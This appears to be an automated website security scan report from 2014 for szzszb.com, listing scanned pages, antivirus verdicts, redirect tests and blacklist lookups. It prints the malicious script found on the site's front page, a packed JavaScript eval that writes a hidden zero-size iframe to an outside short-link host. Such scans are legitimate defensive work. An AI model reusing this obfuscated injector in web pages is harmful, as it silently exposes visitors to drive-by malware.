Scanned pages/files
Request | Server response | Status |
http://szzszb.com/ | 200 OK Content-Length: 7396 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2:\\/\\/3.7\\/a\\" b=\\"0\\" 8=\\"0\\" 9=\\"0\\"><\\/1>");',12,12,'|iframe|http|url|src|document|writeln|cn|height|frameborder|GDxZxd|width'.split('|'),0,{}))
Antivirus reports:
http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://lib.sinaapp.com/js/swfobject/2.2/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://szzszb.com/gsjj | HTTP/1.1 302 Found Connection: close Location: /gsjj/ Server: kangle/3.2.8 | clean |
http://szzszb.com/gsjj/ | 200 OK Content-Length: 16251 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/js.js | 200 OK Content-Length: 1110 Content-Type: text/javascript | clean |
http://szzszb.com/gsjj/zizhizhengshu/ | 200 OK Content-Length: 6614 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/jquery.js | 200 OK Content-Length: 82339 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/scripts.js | 200 OK Content-Length: 5239 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/Zoom.js | 200 OK Content-Length: 23792 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/ZoomHTML.js | 200 OK Content-Length: 12119 Content-Type: text/javascript | clean |
http://szzszb.com/gsjj/shipinzhanshi/ | 200 OK Content-Length: 2854 Content-Type: text/html | clean |
http://szzszb.com/product | HTTP/1.1 302 Found Connection: close Location: /product/ Server: kangle/3.2.8 | clean |
http://szzszb.com/product/ | 200 OK Content-Length: 79449 Content-Type: text/html | clean |
http://szzszb.com/templets/biao/js/easing.js | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/MogFocus.js | 200 OK Content-Length: 8757 Content-Type: text/javascript | clean |
http://szzszb.com/templets/biao/js/png.js | 200 OK Content-Length: 1512 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: szzszb.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 May 2014 11:40:27 GMT
Server: kangle/3.2.8
Content-Length: 7396
Content-Type: text/html
Last-Modified: Sat, 03 May 2014 08:40:18 GMT
...7396 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: szzszb.com
Referer: http://www.google.com/search?q=szzszb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=szzszb.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://szzszb.com/
Result: szzszb.com is not infected or malware details are not published yet.